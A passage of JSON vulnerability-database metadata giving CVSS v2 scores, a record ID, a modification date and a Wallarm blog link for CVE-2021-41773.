"cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-15T23:13:35", "id": "WALLARMLAB:6D3FED0879553B4C47AD26ED1DEB5AEB", "href": "https://lab.wallarm.com/wallarm-starts-to-highlight-cve-to-address-owasp-top-10-a6-vulnerable-and-outdated-components/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}]}
